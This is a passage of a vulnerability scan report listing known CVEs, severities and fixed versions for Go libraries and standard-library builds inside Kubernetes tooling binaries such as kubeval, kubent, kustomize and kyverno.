CVE-2025-61728 | HIGH | v1.23.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.23.5 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.23.5 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.23.5 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22866 | MEDIUM | v1.23.5 | 1.22.12, 1.23.6, 1.24.0-rc.3 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.23.5 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.23.5 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.23.5 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.23.5 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.23.5 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.23.5 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.23.5 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.23.5 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.23.5 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.23.5 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.23.5 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.23.5 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.23.5 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.23.5 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/kubeconform
22 known vulnerabilities found (MEDIUM: 14 LOW: 0 CRITICAL: 1 HIGH: 7)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.24.2 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-22874 | HIGH | v1.24.2 | 1.24.4 |
stdlib |
CVE-2025-47907 | HIGH | v1.24.2 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.24.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.24.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.24.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.24.2 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.24.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.24.2 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.24.2 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.24.2 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.24.2 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.24.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.24.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.24.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.24.2 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.24.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.24.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.24.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.24.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.24.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.24.2 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/kubent
40 known vulnerabilities found (CRITICAL: 1 HIGH: 11 MEDIUM: 28 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
github.com/open-policy-agent/opa |
CVE-2025-46569 | HIGH | v0.67.1 | 1.4.0 |
github.com/open-policy-agent/opa |
CVE-2024-8260 | MEDIUM | v0.67.1 | 0.68.0 |
golang.org/x/net |
CVE-2025-22870 | MEDIUM | v0.27.0 | 0.36.0 |
golang.org/x/net |
CVE-2025-22872 | MEDIUM | v0.27.0 | 0.38.0 |
golang.org/x/oauth2 |
CVE-2025-22868 | HIGH | v0.16.0 | 0.27.0 |
helm.sh/helm/v3 |
CVE-2024-26147 | HIGH | v3.13.3 | 3.14.2 |
helm.sh/helm/v3 |
CVE-2025-53547 | HIGH | v3.13.3 | 3.18.4, 3.17.4 |
helm.sh/helm/v3 |
CVE-2024-25620 | MEDIUM | v3.13.3 | 3.14.1 |
helm.sh/helm/v3 |
CVE-2025-32386 | MEDIUM | v3.13.3 | 3.17.3 |
helm.sh/helm/v3 |
CVE-2025-32387 | MEDIUM | v3.13.3 | 3.17.3 |
helm.sh/helm/v3 |
CVE-2025-55198 | MEDIUM | v3.13.3 | 3.18.5 |
helm.sh/helm/v3 |
CVE-2025-55199 | MEDIUM | v3.13.3 | 3.18.5 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.23.0 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2024-34156 | HIGH | v1.23.0 | 1.22.7, 1.23.1 |
stdlib |
CVE-2025-47907 | HIGH | v1.23.0 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.23.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.23.0 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.23.0 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.23.0 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.23.0 | 1.24.12, 1.25.6 |
stdlib |
CVE-2024-34155 | MEDIUM | v1.23.0 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-34158 | MEDIUM | v1.23.0 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-45336 | MEDIUM | v1.23.0 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2024-45341 | MEDIUM | v1.23.0 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.23.0 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22866 | MEDIUM | v1.23.0 | 1.22.12, 1.23.6, 1.24.0-rc.3 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.23.0 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.23.0 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.23.0 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.23.0 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.23.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.23.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.23.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.23.0 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.23.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.23.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.23.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.23.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.23.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.23.0 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/kubepug
45 known vulnerabilities found (MEDIUM: 33 LOW: 0 CRITICAL: 2 HIGH: 10)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
golang.org/x/net |
CVE-2023-45288 | MEDIUM | v0.17.0 | 0.23.0 |
golang.org/x/net |
CVE-2025-22870 | MEDIUM | v0.17.0 | 0.36.0 |
golang.org/x/net |
CVE-2025-22872 | MEDIUM | v0.17.0 | 0.38.0 |
golang.org/x/oauth2 |
CVE-2025-22868 | HIGH | v0.8.0 | 0.27.0 |
google.golang.org/protobuf |
CVE-2024-24786 | MEDIUM | v1.30.0 | 1.33.0 |
stdlib |
CVE-2024-24790 | CRITICAL | v1.21.3 | 1.21.11, 1.22.4 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.21.3 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2023-45283 | HIGH | v1.21.3 | 1.20.11, 1.21.4, 1.20.12, 1.21.5 |
stdlib |
CVE-2023-45288 | HIGH | v1.21.3 | 1.21.9, 1.22.2 |
stdlib |
CVE-2024-34156 | HIGH | v1.21.3 | 1.22.7, 1.23.1 |
stdlib |
CVE-2025-47907 | HIGH | v1.21.3 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.21.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.21.3 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.21.3 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.21.3 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.21.3 | 1.24.12, 1.25.6 |
stdlib |
CVE-2023-39326 | MEDIUM | v1.21.3 | 1.20.12, 1.21.5 |
stdlib |
CVE-2023-45284 | MEDIUM | v1.21.3 | 1.20.11, 1.21.4 |
stdlib |
CVE-2023-45289 | MEDIUM | v1.21.3 | 1.21.8, 1.22.1 |
stdlib |
CVE-2023-45290 | MEDIUM | v1.21.3 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24783 | MEDIUM | v1.21.3 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24784 | MEDIUM | v1.21.3 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24785 | MEDIUM | v1.21.3 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24789 | MEDIUM | v1.21.3 | 1.21.11, 1.22.4 |
stdlib |
CVE-2024-24791 | MEDIUM | v1.21.3 | 1.21.12, 1.22.5 |
stdlib |
CVE-2024-34155 | MEDIUM | v1.21.3 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-34158 | MEDIUM | v1.21.3 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-45336 | MEDIUM | v1.21.3 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2024-45341 | MEDIUM | v1.21.3 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.21.3 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22866 | MEDIUM | v1.21.3 | 1.22.12, 1.23.6, 1.24.0-rc.3 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.21.3 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.21.3 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.21.3 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.21.3 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.21.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.21.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.21.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.21.3 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.21.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.21.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.21.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.21.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.21.3 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.21.3 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/kubescape
2 known vulnerabilities found (HIGH: 1 MEDIUM: 0 LOW: 1 CRITICAL: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
github.com/anchore/grype |
CVE-2025-65965 | HIGH | v0.99.1 | 0.104.1 |
github.com/cloudflare/circl |
CVE-2026-1229 | LOW | v1.6.1 | 1.6.3 |
No Misconfigurations found
usr/local/bin/kubesec
29 known vulnerabilities found (LOW: 0 CRITICAL: 2 HIGH: 7 MEDIUM: 20)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
golang.org/x/crypto |
CVE-2024-45337 | CRITICAL | v0.29.0 | 0.31.0 |
golang.org/x/crypto |
CVE-2025-22869 | HIGH | v0.29.0 | 0.35.0 |
golang.org/x/crypto |
CVE-2025-47914 | MEDIUM | v0.29.0 | 0.45.0 |
golang.org/x/crypto |
CVE-2025-58181 | MEDIUM | v0.29.0 | 0.45.0 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.23.1 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-47907 | HIGH | v1.23.1 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.23.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.23.1 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.23.1 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.23.1 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.23.1 | 1.24.12, 1.25.6 |
stdlib |
CVE-2024-45336 | MEDIUM | v1.23.1 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2024-45341 | MEDIUM | v1.23.1 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.23.1 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22866 | MEDIUM | v1.23.1 | 1.22.12, 1.23.6, 1.24.0-rc.3 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.23.1 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.23.1 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.23.1 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.23.1 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.23.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.23.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.23.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.23.1 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.23.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.23.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.23.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.23.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.23.1 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.23.1 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/kubeval
102 known vulnerabilities found (HIGH: 50 MEDIUM: 46 LOW: 1 CRITICAL: 5)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
golang.org/x/sys |
CVE-2022-29526 | MEDIUM | v0.0.0-20200223170610-d5e6a3e2c0ae | 0.0.0-20220412211240-33da011f77ad |
golang.org/x/text |
CVE-2021-38561 | HIGH | v0.3.2 | 0.3.7 |
golang.org/x/text |
CVE-2022-32149 | HIGH | v0.3.2 | 0.3.8 |
golang.org/x/text |
CVE-2020-14040 | MEDIUM | v0.3.2 | 0.3.3 |
stdlib |
CVE-2022-23806 | CRITICAL | v1.16.2 | 1.16.14, 1.17.7 |
stdlib |
CVE-2023-24538 | CRITICAL | v1.16.2 | 1.19.8, 1.20.3 |
stdlib |
CVE-2023-24540 | CRITICAL | v1.16.2 | 1.19.9, 1.20.4 |
stdlib |
CVE-2024-24790 | CRITICAL | v1.16.2 | 1.21.11, 1.22.4 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.16.2 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2021-33195 | HIGH | v1.16.2 | 1.15.13, 1.16.5 |
stdlib |
CVE-2021-33196 | HIGH | v1.16.2 | 1.15.13, 1.16.5 |
stdlib |
CVE-2021-33198 | HIGH | v1.16.2 | 1.15.13, 1.16.5 |
stdlib |
CVE-2021-39293 | HIGH | v1.16.2 | 1.16.8, 1.17.1 |
stdlib |
CVE-2021-41771 | HIGH | v1.16.2 | 1.16.10, 1.17.3 |
stdlib |
CVE-2021-41772 | HIGH | v1.16.2 | 1.16.10, 1.17.3 |
stdlib |
CVE-2021-44716 | HIGH | v1.16.2 | 1.16.12, 1.17.5 |
stdlib |
CVE-2022-23772 | HIGH | v1.16.2 | 1.16.14, 1.17.7 |
stdlib |
CVE-2022-24675 | HIGH | v1.16.2 | 1.17.9, 1.18.1 |
stdlib |
CVE-2022-24921 | HIGH | v1.16.2 | 1.16.15, 1.17.8 |
stdlib |
CVE-2022-27664 | HIGH | v1.16.2 | 1.18.6, 1.19.1 |
stdlib |
CVE-2022-28131 | HIGH | v1.16.2 | 1.17.12, 1.18.4 |
stdlib |
CVE-2022-28327 | HIGH | v1.16.2 | 1.17.9, 1.18.1 |
stdlib |
CVE-2022-2879 | HIGH | v1.16.2 | 1.18.7, 1.19.2 |
stdlib |
CVE-2022-2880 | HIGH | v1.16.2 | 1.18.7, 1.19.2 |
stdlib |
CVE-2022-29804 | HIGH | v1.16.2 | 1.17.11, 1.18.3 |
stdlib |
CVE-2022-30580 | HIGH | v1.16.2 | 1.17.11, 1.18.3 |
stdlib |
CVE-2022-30630 | HIGH | v1.16.2 | 1.17.12, 1.18.4 |
stdlib |
CVE-2022-30631 | HIGH | v1.16.2 | 1.17.12, 1.18.4 |
stdlib |
CVE-2022-30632 | HIGH | v1.16.2 | 1.17.12, 1.18.4 |
stdlib |
CVE-2022-30633 | HIGH | v1.16.2 | 1.17.12, 1.18.4 |
stdlib |
CVE-2022-30634 | HIGH | v1.16.2 | 1.17.11, 1.18.3 |
stdlib |
CVE-2022-30635 | HIGH | v1.16.2 | 1.17.12, 1.18.4 |
stdlib |
CVE-2022-32189 | HIGH | v1.16.2 | 1.17.13, 1.18.5 |
stdlib |
CVE-2022-41715 | HIGH | v1.16.2 | 1.18.7, 1.19.2 |
stdlib |
CVE-2022-41716 | HIGH | v1.16.2 | 1.18.8, 1.19.3 |
stdlib |
CVE-2022-41720 | HIGH | v1.16.2 | 1.18.9, 1.19.4 |
stdlib |
CVE-2022-41722 | HIGH | v1.16.2 | 1.19.6, 1.20.1 |
stdlib |
CVE-2022-41723 | HIGH | v1.16.2 | 1.19.6, 1.20.1 |
stdlib |
CVE-2022-41724 | HIGH | v1.16.2 | 1.19.6, 1.20.1 |
stdlib |
CVE-2022-41725 | HIGH | v1.16.2 | 1.19.6, 1.20.1 |
stdlib |
CVE-2023-24534 | HIGH | v1.16.2 | 1.19.8, 1.20.3 |
stdlib |
CVE-2023-24536 | HIGH | v1.16.2 | 1.19.8, 1.20.3 |
stdlib |
CVE-2023-24537 | HIGH | v1.16.2 | 1.19.8, 1.20.3 |
stdlib |
CVE-2023-24539 | HIGH | v1.16.2 | 1.19.9, 1.20.4 |
stdlib |
CVE-2023-29400 | HIGH | v1.16.2 | 1.19.9, 1.20.4 |
stdlib |
CVE-2023-29403 | HIGH | v1.16.2 | 1.19.10, 1.20.5 |
stdlib |
CVE-2023-39325 | HIGH | v1.16.2 | 1.20.10, 1.21.3 |
stdlib |
CVE-2023-45283 | HIGH | v1.16.2 | 1.20.11, 1.21.4, 1.20.12, 1.21.5 |
stdlib |
CVE-2023-45287 | HIGH | v1.16.2 | 1.20.0 |
stdlib |
CVE-2023-45288 | HIGH | v1.16.2 | 1.21.9, 1.22.2 |
stdlib |
CVE-2024-34156 | HIGH | v1.16.2 | 1.22.7, 1.23.1 |
stdlib |
CVE-2025-47907 | HIGH | v1.16.2 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.16.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.16.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.16.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.16.2 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.16.2 | 1.24.12, 1.25.6 |
stdlib |
CVE-2021-31525 | MEDIUM | v1.16.2 | 1.15.12, 1.16.4 |
stdlib |
CVE-2021-33197 | MEDIUM | v1.16.2 | 1.15.13, 1.16.5 |
stdlib |
CVE-2021-34558 | MEDIUM | v1.16.2 | 1.15.14, 1.16.6 |
stdlib |
CVE-2021-36221 | MEDIUM | v1.16.2 | 1.15.15, 1.16.7 |
stdlib |
CVE-2021-44717 | MEDIUM | v1.16.2 | 1.16.12, 1.17.5 |
stdlib |
CVE-2022-1705 | MEDIUM | v1.16.2 | 1.17.12, 1.18.4 |
stdlib |
CVE-2022-1962 | MEDIUM | v1.16.2 | 1.17.12, 1.18.4 |
stdlib |
CVE-2022-29526 | MEDIUM | v1.16.2 | 1.17.10, 1.18.2 |
stdlib |
CVE-2022-32148 | MEDIUM | v1.16.2 | 1.17.12, 1.18.4 |
stdlib |
CVE-2022-41717 | MEDIUM | v1.16.2 | 1.18.9, 1.19.4 |
stdlib |
CVE-2023-24532 | MEDIUM | v1.16.2 | 1.19.7, 1.20.2 |
stdlib |
CVE-2023-29406 | MEDIUM | v1.16.2 | 1.19.11, 1.20.6 |
stdlib |
CVE-2023-29409 | MEDIUM | v1.16.2 | 1.19.12, 1.20.7, 1.21.0-rc.4 |
stdlib |
CVE-2023-39318 | MEDIUM | v1.16.2 | 1.20.8, 1.21.1 |
stdlib |
CVE-2023-39319 | MEDIUM | v1.16.2 | 1.20.8, 1.21.1 |
stdlib |
CVE-2023-39326 | MEDIUM | v1.16.2 | 1.20.12, 1.21.5 |
stdlib |
CVE-2023-45284 | MEDIUM | v1.16.2 | 1.20.11, 1.21.4 |
stdlib |
CVE-2023-45289 | MEDIUM | v1.16.2 | 1.21.8, 1.22.1 |
stdlib |
CVE-2023-45290 | MEDIUM | v1.16.2 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24783 | MEDIUM | v1.16.2 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24784 | MEDIUM | v1.16.2 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24785 | MEDIUM | v1.16.2 | 1.21.8, 1.22.1 |
stdlib |
CVE-2024-24789 | MEDIUM | v1.16.2 | 1.21.11, 1.22.4 |
stdlib |
CVE-2024-24791 | MEDIUM | v1.16.2 | 1.21.12, 1.22.5 |
stdlib |
CVE-2024-34155 | MEDIUM | v1.16.2 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-34158 | MEDIUM | v1.16.2 | 1.22.7, 1.23.1 |
stdlib |
CVE-2024-45336 | MEDIUM | v1.16.2 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2024-45341 | MEDIUM | v1.16.2 | 1.22.11, 1.23.5, 1.24.0-rc.2 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.16.2 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22866 | MEDIUM | v1.16.2 | 1.22.12, 1.23.6, 1.24.0-rc.3 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.16.2 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.16.2 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.16.2 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.16.2 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.16.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.16.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.16.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.16.2 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.16.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.16.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.16.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.16.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.16.2 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.16.2 | 1.24.11, 1.25.5 |
stdlib |
CVE-2022-30629 | LOW | v1.16.2 | 1.17.11, 1.18.3 |
No Misconfigurations found
usr/local/bin/kustomize
23 known vulnerabilities found (CRITICAL: 1 HIGH: 7 MEDIUM: 15 LOW: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.24.0 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-22874 | HIGH | v1.24.0 | 1.24.4 |
stdlib |
CVE-2025-47907 | HIGH | v1.24.0 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-58183 | HIGH | v1.24.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61726 | HIGH | v1.24.0 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61728 | HIGH | v1.24.0 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-61729 | HIGH | v1.24.0 | 1.24.11, 1.25.5 |
stdlib |
CVE-2025-61730 | HIGH | v1.24.0 | 1.24.12, 1.25.6 |
stdlib |
CVE-2025-0913 | MEDIUM | v1.24.0 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-22871 | MEDIUM | v1.24.0 | 1.23.8, 1.24.2 |
stdlib |
CVE-2025-22873 | MEDIUM | v1.24.0 | 1.23.9, 1.24.3 |
stdlib |
CVE-2025-4673 | MEDIUM | v1.24.0 | 1.23.10, 1.24.4 |
stdlib |
CVE-2025-47906 | MEDIUM | v1.24.0 | 1.23.12, 1.24.6 |
stdlib |
CVE-2025-47912 | MEDIUM | v1.24.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58185 | MEDIUM | v1.24.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58186 | MEDIUM | v1.24.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58187 | MEDIUM | v1.24.0 | 1.24.9, 1.25.3 |
stdlib |
CVE-2025-58188 | MEDIUM | v1.24.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-58189 | MEDIUM | v1.24.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61723 | MEDIUM | v1.24.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61724 | MEDIUM | v1.24.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61725 | MEDIUM | v1.24.0 | 1.24.8, 1.25.2 |
stdlib |
CVE-2025-61727 | MEDIUM | v1.24.0 | 1.24.11, 1.25.5 |
No Misconfigurations found
usr/local/bin/kyverno
3 known vulnerabilities found (LOW: 1 CRITICAL: 1 HIGH: 0 MEDIUM: 1)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
github.com/cloudflare/circl |
CVE-2026-1229 | LOW | v1.6.1 | 1.6.3 |
github.com/go-git/go-git/v5 |
CVE-2026-25934 | MEDIUM | v5.16.4 | 5.16.5 |
stdlib |
CVE-2025-68121 | CRITICAL | v1.25.6 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
No Misconfigurations found
usr/local/bin/nova
4 known vulnerabilities found (LOW: 0 CRITICAL: 1 HIGH: 3 MEDIUM: 0)
Show detailed table of vulnerabilities
| Package | ID | Severity | Installed Version | Fixed Version |
|---|---|---|---|---|
stdlib |
CVE-2025-68121 | CRITICAL | v1.25.5 | 1.24.13, 1.25.7, 1.26.0-rc.3 |
stdlib |
CVE-2025-61726 | HIGH | v1.25.5 | 1.24.12, 1.25.6 |
stdlib |
